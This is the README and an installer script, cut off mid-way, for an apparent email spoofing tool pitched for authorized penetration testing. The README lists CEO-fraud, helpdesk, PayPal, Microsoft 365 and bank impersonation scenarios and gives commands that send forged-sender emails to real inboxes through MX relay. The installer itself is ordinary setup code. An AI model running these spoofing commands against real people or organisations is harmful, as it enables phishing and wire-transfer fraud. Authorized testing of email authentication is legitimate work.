4 |
5 | 
6 |
7 | [](https://github.com/techsky-eh/EST)
8 | [](LICENSE)
9 | [](https://python.org)
10 | [](https://github.com/techsky-eh/EST)
11 | [](https://kali.org)
12 |
13 | **Professional Email Security Assessment Framework**
14 |
15 | *For authorized penetration testing, security research, and educational purposes*
16 |
17 |
18 |
19 | ## 🎯 Overview
20 |
21 | EST (Email Spoofing Tool) is a comprehensive, professional-grade framework designed for authorized email security assessments, penetration testing, and cybersecurity education. This tool demonstrates email spoofing vulnerabilities and helps security professionals evaluate the effectiveness of email authentication mechanisms.
22 |
23 | ### ⚠️ Legal Disclaimer
24 |
25 | **EST is intended for authorized security testing and educational purposes only.** Users must obtain explicit written permission before testing any systems they do not own or have authorization to test. Unauthorized use of this tool may violate local, state, and federal laws. The developers assume no liability for misuse or damage caused by this program.
26 |
27 | ## ✨ Key Features
28 |
29 | ### 🔧 Core Capabilities
30 | - **Professional SMTP Server** - Multi-threaded, RFC-compliant SMTP server for testing
31 | - **Pre-built Attack Scenarios** - 5 realistic email spoofing scenarios covering common attack vectors
32 | - **Custom Test Creation** - Build and execute custom spoofing tests with full control
33 | - **Comprehensive Logging** - Detailed audit trails for all security tests
34 | - **Assessment Reporting** - Generate professional security assessment reports
35 | - **Real-time Email Relay** - Automatic delivery to real email destinations for testing
36 | - **Python 3.13+ Compatible** - Works with latest Python versions including Kali Linux
37 |
38 | ### 🎭 Attack Scenarios Included
39 |
40 | | Scenario | Category | Severity | Description |
41 | |----------|----------|----------|-------------|
42 | | CEO Fraud | Business Email Compromise | 🔴 Critical | Executive impersonation for wire transfer fraud |
43 | | IT Helpdesk | Technical Support Fraud | 🟠 High | IT support impersonation for credential harvesting |
44 | | PayPal Security | Financial Services Phishing | 🟠 High | Payment service spoofing for account compromise |
45 | | Microsoft 365 | Software/License Fraud | 🟡 Medium | License expiration scam for credential theft |
46 | | Bank Alert | Financial Institution Fraud | 🔴 Critical | Banking institution impersonation |
47 |
48 | ### 🏗️ Architecture
49 |
50 | ```
51 | EST Framework
52 | ├── SMTP Testing Server (Multi-threaded)
53 | ├── Scenario Engine (Pre-built + Custom)
54 | ├── Email Relay System (MX Resolution)
55 | ├── Audit & Logging System
56 | ├── Report Generation Engine
57 | ├── Python Environment Manager (3.13+ compatible)
58 | └── Professional CLI Interface
59 | ```
60 |
61 | ## 🚀 Quick Start
62 |
63 | ### Prerequisites
64 | - Python 3.8 or higher (including Python 3.13+)
65 | - Linux/macOS/Windows (optimized for Kali Linux)
66 | - Network connectivity for email delivery testing
67 |
68 | ### Installation
69 |
70 | #### 🐧 Kali Linux / Python 3.13+ (Recommended)
71 |
72 | ```bash
73 | # Clone the repository
74 | git clone https://github.com/techsky-eh/EST.git
75 | cd EST
76 |
77 | # Make installer executable
78 | chmod +x install.sh
79 |
80 | # Run the fixed installer (handles Python 3.13+ automatically)
81 | ./install.sh
82 | ```
83 |
84 | The installer will automatically:
85 | - Detect Python 3.13+ and create a virtual environment
86 | - Install system dependencies via apt
87 | - Handle externally-managed-environment issues
88 | - Create isolated Python environment for EST
89 |
90 | #### 🖥️ Other Linux Distributions
91 |
92 | ```bash
93 | # Clone the repository
94 | git clone https://github.com/techsky-eh/EST.git
95 | cd EST
96 |
97 | # Install dependencies
98 | pip install -r requirements.txt
99 |
100 | # Install system-wide (optional)
101 | sudo ./install.sh
102 | ```
103 |
104 | #### 🍎 macOS
105 |
106 | ```bash
107 | # Install Python and dependencies
108 | brew install python3 telnet
109 |
110 | # Clone and install EST
111 | git clone https://github.com/techsky-eh/EST.git
112 | cd EST
113 | ./install.sh
114 | ```
115 |
116 | ### Basic Usage
117 |
118 | ```bash
119 | # Start SMTP testing server
120 | est server --port 2525
121 |
122 | # List available attack scenarios
123 | est list
124 |
125 | # Execute CEO fraud scenario
126 | est test 1 target@company.com
127 |
128 | # Run custom spoofing test
129 | est custom --from-email "ceo@company.com" \
130 | --from-name "John Smith, CEO" \
131 | --subject "Urgent Request" \
132 | --body "Please handle this immediately" \
133 | --target "employee@company.com"
134 |
135 | # View test logs
136 | est logs --lines 50
137 |
138 | # Generate assessment report
139 | est report
140 | ```
141 |
142 | ## 📚 Comprehensive Documentation
143 |
144 | ### Command Reference
145 |
146 | #### Server Operations
147 | ```bash
148 | # Start SMTP server (standard port, requires sudo)
149 | sudo est server --port 25
150 |
151 | # Start on unprivileged port (recommended)
152 | est server --port 2525
153 |
154 | # Bind to specific interface
155 | est server --host 192.168.1.100 --port 2525
156 | ```
157 |
158 | #### Testing Operations
159 | ```bash
160 | # List all scenarios with details
161 | est list
162 |
163 | # Execute specific scenario by ID
164 | est test
165 |
166 | # Execute with custom SMTP server
167 | est test 1 target@company.com --smtp-host mail.company.com --smtp-port 25
168 |
169 | # Custom spoofing test
170 | est custom --from-email \
171 | --from-name \
172 | --subject \
173 | --body \
174 | --target
175 | ```
176 |
177 | #### Monitoring & Reporting
178 | ```bash
179 | # View recent test logs
180 | est logs
181 |
182 | # View more log entries
183 | est logs --lines 100
184 |
185 | # Generate comprehensive report
186 | est report
187 |
188 | # Generate report to specific file
189 | est report --output /path/to/report.json
190 | ```
191 |
192 | ### Configuration
193 |
194 | EST stores configuration in `~/.est/config.json`:
195 |
196 | ```json
197 | {
198 | "version": "2.0.1",
199 | "smtp_server": {
200 | "host": "0.0.0.0",
201 | "port": 2525,
202 | "timeout": 30
203 | },
204 | "scenarios": [
205 | {
206 | "name": "Custom CEO Fraud",
207 | "category": "Business Email Compromise",
208 | "from_email": "ceo@yourcompany.com",
209 | "from_name": "Your CEO Name",
210 | "subject": "Urgent Business Matter",
211 | "body": "Custom email body...",
212 | "description": "Custom scenario description",
213 | "severity": "Critical"
214 | }
215 | ],
216 | "temp_email_services": [
217 | "guerrillamail.com",
218 | "mailinator.com"
219 | ]
220 | }
221 | ```
222 |
223 | ## 🔬 Advanced Usage
224 |
225 | ### Professional Assessment Workflow
226 |
227 | 1. **Environment Setup**
228 | ```bash
229 | # Start EST server in isolated environment
230 | est server --port 2525
231 | ```
232 |
233 | 2. **Baseline Testing**
234 | ```bash
235 | # Test with temporary email addresses first
236 | est test 1 test@guerrillamail.com
237 | est test 2 test@mailinator.com
238 | ```
239 |
240 | 3. **Target Assessment**
241 | ```bash
242 | # Execute scenarios against target domain
243 | est test 1 employee@target-company.com
244 | est test 3 finance@target-company.com
245 | ```
246 |
247 | 4. **Custom Attack Simulation**
248 | ```bash
249 | # Company-specific spoofing tests
250 | est custom --from-email "ceo@target-company.com" \
251 | --from-name "Target CEO Name" \
252 | --subject "Quarterly Budget Review" \
253 | --body "Please review attached budget..." \
254 | --target "cfo@target-company.com"
255 | ```
256 |
257 | 5. **Results Analysis**
258 | ```bash
259 | # Review logs and generate report
260 | est logs --lines 100
261 | est report --output assessment_report.json
262 | ```
263 |
264 | ### Integration with Security Testing
265 |
266 | EST integrates seamlessly with other security testing tools:
267 |
268 | ```bash
269 | # Use with network analysis
270 | tcpdump -i any port 25 &
271 | est test 1 target@company.com
272 |
273 | # Combine with social engineering toolkit
274 | # Use EST for email component of broader campaigns
275 |
276 | # Integration with reporting frameworks
277 | est report --output ./reports/email_assessment.json
278 | ```
279 |
280 | ## 📊 Sample Output
281 |
282 | ### Scenario Execution
283 | ```
284 | 🎯 Executing Email Spoofing Test
285 | ────────────────────────────────────────
286 | 📧 Scenario: CEO Fraud - Urgent Wire Transfer
287 | 🏷️ Category: Business Email Compromise
288 | ⚠️ Severity: Critical
289 | 📤 Spoofed From: John Smith, CEO
290 | 📥 Target: employee@company.com
291 | 📡 SMTP Server: localhost:2525
292 | 🕐 Timestamp: 2024-03-15 14:30:22
293 |
294 | 🚀 Initiating SMTP connection...
295 | 📤 Sending spoofed email...
296 | ✅ Email spoofing test completed successfully!
297 | 📋 Check target inbox: employee@company.com
298 | ```
299 |
300 | ### Assessment Report Summary
301 | ```
302 | 📋 EST Security Assessment Summary
303 | ══════════════════════════════════════════════════
304 | 📊 Total Tests: 15
305 | ✅ Successful: 12
306 | ❌ Failed: 3
307 | 📈 Success Rate: 80.0%
308 | 🔴 Risk Level: CRITICAL - Immediate action required
309 |
310 | 📚 Recommendations: 8 items
311 | • 🔴 CRITICAL: High email spoofing success rate detected
312 | • Implement SPF, DKIM, and DMARC email authentication
313 | • Configure email security gateways with spoofing detection
314 | ... and 5 more
315 | ```
316 |
317 | ## 🛡️ Security Best Practices
318 |
319 | ### For Security Professionals
320 | - **Always obtain written authorization** before conducting tests
321 | - **Use isolated test environments** when possible
322 | - **Document all testing activities** for compliance
323 | - **Follow responsible disclosure** for any vulnerabilities found
324 | - **Respect privacy and confidentiality** of all test data
325 |
326 | ### Recommended Test Environment
327 | - Isolated network segment for testing
328 | - Virtual machines for server deployment
329 | - Temporary email services for initial validation
330 | - Proper logging and monitoring infrastructure
331 |
332 | ### Legal Compliance
333 | - Obtain explicit written permission from system owners
334 | - Ensure compliance with local and international laws
335 | - Document the scope and limitations of testing
336 | - Maintain confidentiality of test results
337 | - Follow organizational security policies
338 |
339 | ## 🔧 Troubleshooting
340 |
341 | ### Python 3.13+ / Kali Linux Issues
342 |
343 | **Problem**: `externally-managed-environment` error
344 | ```bash
345 | # Solution 1: Use the fixed installer (automatically creates venv)
346 | ./install.sh
347 |
348 | # Solution 2: Manual virtual environment
349 | python3 -m venv ~/.est-env
350 | source ~/.est-env/bin/activate
351 | pip install dnspython
352 |
353 | # Solution 3: Use system packages
354 | sudo apt install python3-dnspython
355 | ```
356 |
357 | **Problem**: Virtual environment not found
358 | ```bash
359 | # Solution: Reinstall or recreate environment
360 | rm -rf ~/.est-env
361 | ./install.sh
362 |
363 | # Or manually recreate
364 | python3 -m venv ~/.est-env
365 | source ~/.est-env/bin/activate
366 | pip install -r requirements.txt
367 | ```
368 |
369 | ### Common Issues
370 |
371 | **Port Permission Denied**
372 | ```bash
373 | # Solution: Use unprivileged port or run as root
374 | est server --port 2525
375 | # OR
376 | sudo est server --port 25
377 | ```
378 |
379 | **DNS Resolution Failures**
380 | ```bash
381 | # Install DNS library
382 | sudo apt install python3-dnspython
383 | # OR in virtual environment
384 | source ~/.est-env/bin/activate
385 | pip install dnspython
386 | ```
387 |
388 | **Email Delivery Failures**
389 | ```bash
390 | # Check SMTP server logs
391 | est logs
392 |
393 | # Verify target email service is accessible
394 | dig MX target-domain.com
395 |
396 | # Test with known working temporary email services
397 | est test 1 test@guerrillamail.com
398 | ```
399 |
400 | **Command Not Found**
401 | ```bash
402 | # Run directly if not installed system-wide
403 | python3 est.py --help
404 |
405 | # Or reinstall
406 | ./install.sh
407 |
408 | # Check if virtual environment is needed
409 | source ~/.est-env/bin/activate
410 | est --help
411 | ```
412 |
413 | ### Environment Verification
414 |
415 | ```bash
416 | # Check EST installation
417 | est --help
418 |
419 | # Verify Python environment
420 | python3 -c "import dns.resolver; print('DNS module working')"
421 |
422 | # Check virtual environment (if used)
423 | echo $VIRTUAL_ENV
424 |
425 | # Test basic functionality
426 | est list
427 | ```
428 |
429 | ## 🎓 Educational Use Cases
430 |
431 | ### Security Awareness Training
432 | - Demonstrate realistic email spoofing attacks
433 | - Show participants how phishing emails are crafted
434 | - Test user awareness and response procedures
435 | - Provide hands-on experience with email security
436 |
437 | ### Academic Research
438 | - Study email authentication mechanisms
439 | - Analyze effectiveness of security controls
440 | - Research social engineering techniques
441 | - Develop new detection methods
442 |
443 | ### Penetration Testing (Authorized)
444 | - Assess organizational email security posture
445 | - Test effectiveness of SPF/DKIM/DMARC policies
446 | - Evaluate user susceptibility to social engineering
447 | - Validate email security gateway configurations
448 |
449 | ## 🤝 Contributing
450 |
451 | We welcome contributions from the security community:
452 |
453 | 1. **Fork the repository**
454 | 2. **Create a feature branch** (`git checkout -b feature/amazing-feature`)
455 | 3. **Commit your changes** (`git commit -m 'Add amazing feature'`)
456 | 4. **Push to the branch** (`git push origin feature/amazing-feature`)
457 | 5. **Open a Pull Request**
458 |
459 | ### Development Guidelines
460 | - Follow PEP 8 style guidelines
461 | - Add comprehensive docstrings
462 | - Include unit tests for new features
463 | - Update documentation as needed
464 | - Ensure compatibility with Python 3.8+
465 | - Test with both virtual environments and system Python
466 |
467 | ## 🐧 Kali Linux Optimization
468 |
469 | EST is specifically optimized for Kali Linux:
470 |
471 | ### Features
472 | - **Automatic virtual environment setup** for Python 3.13+
473 | - **System package integration** with apt
474 | - **Network interface binding** for pentesting environments
475 | - **Integration with Kali tools** and workflows
476 |
477 | ### Installation
478 | ```bash
479 | # One-command installation on Kali
480 | ./install.sh
481 |
482 | # Manual method for Kali
483 | sudo apt install python3-dnspython telnet dnsutils
484 | python3 -m venv ~/.est-env
485 | source ~/.est-env/bin/activate
486 | pip install setuptools wheel
487 | python3 est.py --help
488 | ```
489 |
490 | ### Usage in Penetration Testing
491 | ```bash
492 | # Professional pentest workflow
493 | est server --port 2525 &
494 | est test 1 target@victim.com
495 | est report --output /root/pentest-reports/email-assessment.json
496 |
497 | # Integration with other tools
498 | tcpdump -i any port 25 &
499 | est test 1 target@example.com
500 | ```
501 |
502 | ## 📄 License
503 |
504 | This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
505 |
506 | ## 🔄 Changelog
507 |
508 | ### v2.0.1 (2025-06-12)
509 | - **Fixed Python 3.13+ compatibility** - Automatic virtual environment creation
510 | - **Enhanced Kali Linux support** - Optimized installation for latest Kali
511 | - **Improved error handling** - Better externally-managed-environment handling
512 | - **Updated documentation** - Comprehensive troubleshooting for modern Python
513 | - **System package integration** - Prefer apt packages over pip when available
514 |
515 | ### v2.0.0 (2025-06-12)
516 | - Complete rewrite for professional security testing
517 | - Multi-threaded SMTP server with real-time email relay
518 | - 5 realistic attack scenarios covering major threat vectors
519 | - Professional CLI interface with comprehensive logging
520 | - Cross-platform compatibility and desktop integration
521 |
522 | ## 🙏 Acknowledgments
523 |
524 | - Security research community for vulnerability insights
525 | - Email authentication standards organizations
526 | - Open source contributors and maintainers
527 | - Educational institutions supporting cybersecurity research
528 | - Kali Linux team for providing excellent penetration testing platform
529 |
530 | ## 📞 Support & Contact
531 |
532 | - **Issues**: [GitHub Issues](https://github.com/techsky-eh/EST/issues)
533 | - **Documentation**: [Wiki](https://github.com/techsky-eh/EST/wiki)
534 | - **Security Reports**: contact@techskyhub.com
535 | - **General Questions**: contact@techskyhub.com
536 |
537 | ### Quick Support
538 |
539 | For common issues:
540 | 1. **Python 3.13+ problems**: Use `./install.sh` (auto-creates venv)
541 | 2. **Kali Linux issues**: Install via `sudo apt install python3-dnspython`
542 | 3. **Permission errors**: Use `est server --port 2525` instead of port 25
543 | 4. **Command not found**: Run `source ~/.est-env/bin/activate` then try again
544 |
545 | ---
546 |
547 |
548 |
549 | **EST v2.0.1** - Professional Email Security Assessment Framework
550 |
551 | Compatible with Python 3.8+ including Python 3.13+ and Kali Linux
552 |
553 | Made with ❤️ by the Tech Sky - Security Research Team
554 |
555 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #
3 | # EST - Email Spoofing Tool
4 | # Professional Installation Script for Linux Systems (Fixed for Python 3.13+)
5 | #
6 | # Author: Security Research Team
7 | # Version: 2.0.1
8 | # License: MIT
9 | #
10 |
11 | set -e
12 |
13 | # Colors for output
14 | readonly RED='\033[0;31m'
15 | readonly GREEN='\033[0;32m'
16 | readonly YELLOW='\033[1;33m'
17 | readonly BLUE='\033[0;34m'
18 | readonly PURPLE='\033[0;35m'
19 | readonly CYAN='\033[0;36m'
20 | readonly NC='\033[0m' # No Color
21 |
22 | # Tool configuration
23 | readonly TOOL_NAME="EST - Email Spoofing Tool"
24 | readonly TOOL_VERSION="2.0.1"
25 | readonly TOOL_AUTHOR="Tech Sky - SRT"
26 | readonly INSTALL_DIR="/opt/est"
27 | readonly BIN_LINK="/usr/local/bin/est"
28 | readonly DESKTOP_DIR="/usr/share/applications"
29 | readonly ICON_DIR="/usr/share/pixmaps"
30 | readonly VENV_DIR="$HOME/.est-env"
31 |
32 | # Status functions
33 | print_banner() {
34 | echo -e "${BLUE}╔══════════════════════════════════════════════════════════════╗${NC}"
35 | echo -e "${BLUE}║ EST INSTALLER v${TOOL_VERSION} ║${NC}"
36 | echo -e "${BLUE}║ Email Spoofing Tool - Professional ║${NC}"
37 | echo -e "${BLUE}║ ║${NC}"
38 | echo -e "${BLUE}║ Advanced Email Security Assessment Framework ║${NC}"
39 | echo -e "${BLUE}║ For Authorized Penetration Testing Only ║${NC}"
40 | echo -e "${BLUE}║ Educational & Research Purposes ║${NC}"
41 | echo -e "${BLUE}║ ║${NC}"
42 | echo -e "${BLUE}║ Author: ${TOOL_AUTHOR}${NC}${BLUE} ║${NC}"
43 | echo -e "${BLUE}╚══════════════════════════════════════════════════════════════╝${NC}"
44 | echo
45 | }
46 |
47 | print_status() {
48 | echo -e "${GREEN}[✓]${NC} $1"
49 | }
50 |
51 | print_warning() {
52 | echo -e "${YELLOW}[!]${NC} $1"
53 | }
54 |
55 | print_error() {
56 | echo -e "${RED}[✗]${NC} $1"
57 | }
58 |
59 | print_info() {
60 | echo -e "${BLUE}[i]${NC} $1"
61 | }
62 |
63 | print_step() {
64 | echo -e "${PURPLE}[→]${NC} $1"
65 | }
66 |
67 | # Check if running as root
68 | check_root() {
69 | if [[ $EUID -eq 0 ]]; then
70 | print_error "Please don't run this script as root!"
71 | echo -e "${YELLOW}💡 Run as regular user with sudo access: ./install.sh${NC}"
72 | exit 1
73 | fi
74 | }
75 |
76 | # Check system compatibility
77 | check_system() {
78 | print_step "Checking system compatibility..."
79 |
80 | # Check OS
81 | if [[ "$OSTYPE" == "linux-gnu"* ]]; then
82 | print_status "Linux system detected"
83 | elif [[ "$OSTYPE" == "darwin"* ]]; then
84 | print_status "macOS system detected"
85 | else
86 | print_warning "Unsupported OS detected, proceeding anyway..."
87 | fi
88 |
89 | # Check Python 3
90 | if ! command -v python3 &> /dev/null; then
91 | print_error "Python 3 is not installed"
92 | echo "Please install Python 3.8 or higher:"
93 | echo " Ubuntu/Debian: sudo apt install python3 python3-pip"
94 | echo " CentOS/RHEL: sudo yum install python3 python3-pip"
95 | echo " macOS: brew install python3"
96 | exit 1
97 | fi
98 |
99 | # Check Python version
100 | PYTHON_VERSION=$(python3 -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
101 | PYTHON_MAJOR=$(echo $PYTHON_VERSION | cut -d'.' -f1)
102 | PYTHON_MINOR=$(echo $PYTHON_VERSION | cut -d'.' -f2)
103 |
104 | if [ "$PYTHON_MAJOR" -eq 3 ] && [ "$PYTHON_MINOR" -ge 8 ]; then
105 | print_status "Python $PYTHON_VERSION detected (compatible)"
106 |
107 | # Check if Python 3.13+ (externally managed environment)
108 | if [ "$PYTHON_MINOR" -ge 13 ]; then
109 | print_warning "Python 3.13+ detected - will use virtual environment"
110 | USE_VENV=true
111 | else
112 | USE_VENV=false
113 | fi
114 | else
115 | print_error "Python 3.8+ required, found $PYTHON_VERSION"
116 | exit 1
117 | fi
118 |
119 | # Check if we're on Kali Linux
120 | if [ -f /etc/os-release ]; then
121 | if grep -q "Kali" /etc/os-release; then
122 | print_status "Kali Linux detected - using optimized installation"
123 | IS_KALI=true
124 | USE_VENV=true # Always use venv on Kali
125 | else
126 | IS_KALI=false
127 | fi
128 | fi
129 |
130 | print_status "System compatibility check passed"
131 | }
132 |
133 | # Install system dependencies
134 | install_dependencies() {
135 | print_step "Installing system dependencies..."
136 |
137 | # Detect package manager and install dependencies
138 | if command -v apt &> /dev/null; then
139 | print_info "Using apt package manager (Debian/Ubuntu/Kali)"
140 | sudo apt update
141 |
142 | # Install core dependencies
143 | sudo apt install -y \
144 | python3-dev \
145 | python3-pip \
146 | python3-setuptools \
147 | python3-wheel \
148 | python3-venv \
149 | telnet \
150 | dnsutils \
151 | curl \
152 | git
153 |
154 | # Install Python DNS library via apt (preferred for system packages)
155 | if sudo apt install -y python3-dnspython; then
156 | print_status "DNS library installed via system package manager"
157 | SYSTEM_DNS_INSTALLED=true
158 | else
159 | print_warning "System DNS package not available, will install via pip"
160 | SYSTEM_DNS_INSTALLED=false
161 | fi
162 |
163 | elif command -v yum &> /dev/null; then
164 | print_info "Using yum package manager (CentOS/RHEL)"
165 | sudo yum update -y
166 | sudo yum install -y \
167 | python3-devel \
168 | python3-pip \
169 | python3-setuptools \
170 | python3-venv \
171 | telnet \
172 | bind-utils \
173 | curl \
174 | git
175 | SYSTEM_DNS_INSTALLED=false
176 |
177 | elif command -v dnf &> /dev/null; then
178 | print_info "Using dnf package manager (Fedora)"
179 | sudo dnf update -y
180 | sudo dnf install -y \
181 | python3-devel \
182 | python3-pip \
183 | python3-setuptools \
184 | python3-venv \
185 | telnet \
186 | bind-utils \
187 | curl \
188 | git \
189 | python3-dns
190 | SYSTEM_DNS_INSTALLED=true
191 |
192 | elif command -v pacman &> /dev/null; then
193 | print_info "Using pacman package manager (Arch Linux)"
194 | sudo pacman -Syu --noconfirm
195 | sudo pacman -S --noconfirm \
196 | python \
197 | python-pip \
198 | python-setuptools \
199 | python-virtualenv \
200 | inetutils \
201 | bind \
202 | curl \
203 | git \
204 | python-dnspython
205 | SYSTEM_DNS_INSTALLED=true
206 |
207 | elif command -v brew &> /dev/null; then
208 | print_info "Using Homebrew (macOS)"
209 | brew install python3 telnet
210 | SYSTEM_DNS_INSTALLED=false
211 |
212 | else
213 | print_warning "Unknown package manager, will install Python dependencies manually"
214 | SYSTEM_DNS_INSTALLED=false
215 | fi
216 |
217 | print_status "System dependencies installed successfully"
218 | }
219 |
220 | # Setup Python environment
221 | setup_python_environment() {
222 | print_step "Setting up Python environment..."
223 |
224 | if [ "$USE_VENV" = true ]; then
225 | print_info "Creating isolated Python virtual environment..."
226 |
227 | # Remove existing venv if it exists
228 | if [ -d "$VENV_DIR" ]; then
229 | print_warning "Removing existing virtual environment..."
230 | rm -rf "$VENV_DIR"
231 | fi
232 |
233 | # Create new virtual environment
234 | python3 -m venv "$VENV_DIR"
235 | print_status "Virtual environment created at $VENV_DIR"
236 |
237 | # Activate virtual environment
238 | source "$VENV_DIR/bin/activate"
239 | print_status "Virtual environment activated"
240 |
241 | # Upgrade pip in virtual environment
242 | pip install --upgrade pip setuptools wheel
243 |
244 | # Install Python dependencies in virtual environment
245 | print_info "Installing Python dependencies in virtual environment..."
246 | if [ "$SYSTEM_DNS_INSTALLED" = false ]; then
247 | pip install dnspython
248 | print_status "DNS library installed in virtual environment"
249 | else
250 | print_status "Using system DNS library"
251 | fi
252 |
253 | PYTHON_ENV="venv"
254 |
255 | else
256 | print_info "Using system Python environment..."
257 |
258 | # Try to install dependencies
259 | print_info "Installing Python dependencies..."
260 |
261 | # Try different installation methods
262 | if pip3 install --user dnspython setuptools wheel 2>/dev/null; then
263 | print_status "Dependencies installed via pip --user"
264 | elif pip3 install --user --break-system-packages dnspython setuptools wheel 2>/dev/null; then
265 | print_status "Dependencies installed with system override"
266 | elif [ "$SYSTEM_DNS_INSTALLED" = true ]; then
267 | print_status "Using system-installed DNS library"
268 | else
269 | print_error "Failed to install Python dependencies"
270 | echo "Please install manually:"
271 | echo " sudo apt install python3-dnspython # Debian/Ubuntu"
272 | echo " pip3 install --user dnspython # Manual install"
273 | exit 1
274 | fi
275 |
276 | PYTHON_ENV="system"
277 | fi
278 |
279 | print_status "Python environment setup completed ($PYTHON_ENV)"
280 | }
281 |
282 | # Create installation directories
283 | setup_directories() {
284 | print_step "Setting up installation directories..."
285 |
286 | # Create main installation directory
287 | if [ ! -d "$INSTALL_DIR" ]; then
288 | sudo mkdir -p "$INSTALL_DIR"
289 | sudo chown $USER:$(id -gn) "$INSTALL_DIR"
290 | print_status "Created installation directory: $INSTALL_DIR"
291 | fi
292 |
293 | # Create subdirectories
294 | sudo mkdir -p "$INSTALL_DIR"/{bin,lib,docs,examples}
295 | sudo chown -R $USER:$(id -gn) "$INSTALL_DIR"
296 |
297 | # Create user configuration directory
298 | USER_CONFIG_DIR="$HOME/.est"
299 | mkdir -p "$USER_CONFIG_DIR"/{reports,logs,scenarios}
300 | print_status "Created user configuration directory: $USER_CONFIG_DIR"
301 |
302 | print_status "Directory structure created"
303 | }
304 |
305 | # Install EST tool
306 | install_tool() {
307 | print_step "Installing EST tool..."
308 |
309 | # Check if main script exists
310 | if [ ! -f "est.py" ]; then
311 | print_error "est.py not found in current directory"
312 | echo "Please ensure you have the EST source files:"
313 | echo " - est.py (main application)"
314 | echo " - requirements.txt (dependencies)"
315 | echo " - README.md (documentation)"
316 | exit 1
317 | fi
318 |
319 | # Copy main application
320 | cp est.py "$INSTALL_DIR/bin/"
321 | chmod +x "$INSTALL_DIR/bin/est.py"
322 | print_status "Installed main application"
323 |
324 | # Create wrapper script based on Python environment
325 | create_wrapper_script
326 |
327 | # Create symbolic link
328 | sudo ln -sf "$INSTALL_DIR/bin/est" "$BIN_LINK"
329 | print_status "Created system-wide command link"
330 |
331 | # Copy documentation
332 | if [ -f "README.md" ]; then
333 | cp README.md "$INSTALL_DIR/docs/"
334 | print_status "Installed documentation"
335 | fi
336 |
337 | # Copy requirements.txt if it exists
338 | if [ -f "requirements.txt" ]; then
339 | cp requirements.txt "$INSTALL_DIR/docs/"
340 | print_status "Installed requirements file"
341 | fi
342 |
343 | # Copy other documentation files
344 | for doc in CHANGELOG.md CONTRIBUTING.md CODE_OF_CONDUCT.md LICENSE; do
345 | if [ -f "$doc" ]; then
346 | cp "$doc" "$INSTALL_DIR/docs/"
347 | fi
348 | done
349 |
350 | # Copy examples if they exist
351 | if [ -d "examples" ]; then
352 | cp -r examples/* "$INSTALL_DIR/examples/"
353 | print_status "Installed example configurations"
354 | fi
355 |
356 | print_status "EST tool installation completed"
357 | }
358 |
359 | # Create wrapper script for better user experience
360 | create_wrapper_script() {
361 | if [ "$USE_VENV" = true ]; then
362 | # Create wrapper that uses virtual environment
363 | cat > "$INSTALL_DIR/bin/est" << EOF
364 | #!/bin/bash
365 | #
366 | # EST - Email Spoofing Tool Wrapper Script (Virtual Environment)
367 | # This script activates the virtual environment and runs EST
368 | #
369 |
370 | INSTALL_DIR="$INSTALL_DIR"
371 | MAIN_SCRIPT="\$INSTALL_DIR/bin/est.py"
372 | VENV_DIR="$VENV_DIR"
373 |
374 | # Check if virtual environment exists
375 | if [ ! -d "\$VENV_DIR" ]; then
376 | echo "❌ EST virtual environment not found at \$VENV_DIR"
377 | echo "💡 Try reinstalling: ./install.sh"
378 | exit 1
379 | fi
380 |
381 | # Check if main script exists
382 | if [ ! -f "\$MAIN_SCRIPT" ]; then
383 | echo "❌ EST installation not found at \$INSTALL_DIR"
384 | echo "💡 Try reinstalling: ./install.sh"
385 | exit 1
386 | fi
387 |
388 | # Activate virtual environment and execute
389 | source "\$VENV_DIR/bin/activate"
390 | exec python3 "\$MAIN_SCRIPT" "\$@"
391 | EOF
392 | else
393 | # Create wrapper for system Python
394 | cat > "$INSTALL_DIR/bin/est" << EOF
395 | #!/bin/bash
396 | #
397 | # EST - Email Spoofing Tool Wrapper Script (System Python)
398 | # This script provides a clean interface to the EST tool
399 | #
400 |
401 | INSTALL_DIR="$INSTALL_DIR"
402 | MAIN_SCRIPT="\$INSTALL_DIR/bin/est.py"
403 |
404 | # Check if main script exists
405 | if [ ! -f "\$MAIN_SCRIPT" ]; then
406 | echo "❌ EST installation not found at \$INSTALL_DIR"
407 | echo "💡 Try reinstalling: ./install.sh"
408 | exit 1
409 | fi
410 |
411 | # Add install directory to Python path
412 | export PYTHONPATH="\$INSTALL_DIR/lib:\$PYTHONPATH"
413 |
414 | # Execute main script with all arguments
415 | exec python3 "\$MAIN_SCRIPT" "\$@"
416 | EOF
417 | fi
418 |
419 | chmod +x "$INSTALL_DIR/bin/est"
420 | print_status "Created wrapper script for $PYTHON_ENV environment"
421 | }
422 |
423 | # Create desktop entry for GUI environments
424 | create_desktop_entry() {
425 | print_step "Creating desktop integration..."
426 |
427 | # Create desktop entry
428 | DESKTOP_FILE="$HOME/.local/share/applications/est.desktop"
429 | mkdir -p "$(dirname "$DESKTOP_FILE")"
430 |
431 | cat > "$DESKTOP_FILE" << EOF
432 | [Desktop Entry]
433 | Name=EST - Email Spoofing Tool
434 | Comment=Professional Email Security Assessment Framework
435 | GenericName=Security Testing Tool
436 | Exec=gnome-terminal --title="EST - Email Spoofing Tool" -- est
437 | Icon=security-high
438 | Terminal=true
439 | Type=Application
440 | Categories=Security;Network;Development;
441 | Keywords=email;security;testing;penetration;spoofing;assessment;
442 | StartupNotify=true
443 | EOF
444 |
445 | # Create system-wide desktop entry (if possible)
446 | if [ -w "$DESKTOP_DIR" ] || sudo [ -w "$DESKTOP_DIR" ] 2>/dev/null; then
447 | sudo cp "$DESKTOP_FILE" "$DESKTOP_DIR/" 2>/dev/null || true
448 | print_status "Created desktop entry"
449 | else
450 | print_status "Created user desktop entry"
451 | fi
452 |
453 | print_status "Desktop integration completed"
454 | }
455 |
456 | # Create comprehensive documentation
457 | create_documentation() {
458 | print_step "Creating documentation..."
459 |
460 | DOC_DIR="$INSTALL_DIR/docs"
461 |
462 | # Create quick start guide
463 | cat > "$DOC_DIR/QUICKSTART.md" << 'EOF'
464 | # EST Quick Start Guide
465 |
466 | ## Basic Commands
467 |
468 | ### Start SMTP Server
469 | ```bash
470 | # Start on unprivileged port (recommended)
471 | est server --port 2525
472 |
473 | # Start on standard SMTP port (requires sudo)
474 | sudo est server --port 25
475 | ```
476 |
477 | ### List Attack Scenarios
478 | ```bash
479 | est list
480 | ```
481 |
482 | ### Run Security Test
483 | ```bash
484 | # Execute predefined scenario
485 | est test 1 target@company.com
486 |
487 | # Custom spoofing test
488 | est custom --from-email "ceo@company.com" \
489 | --from-name "John Smith" \
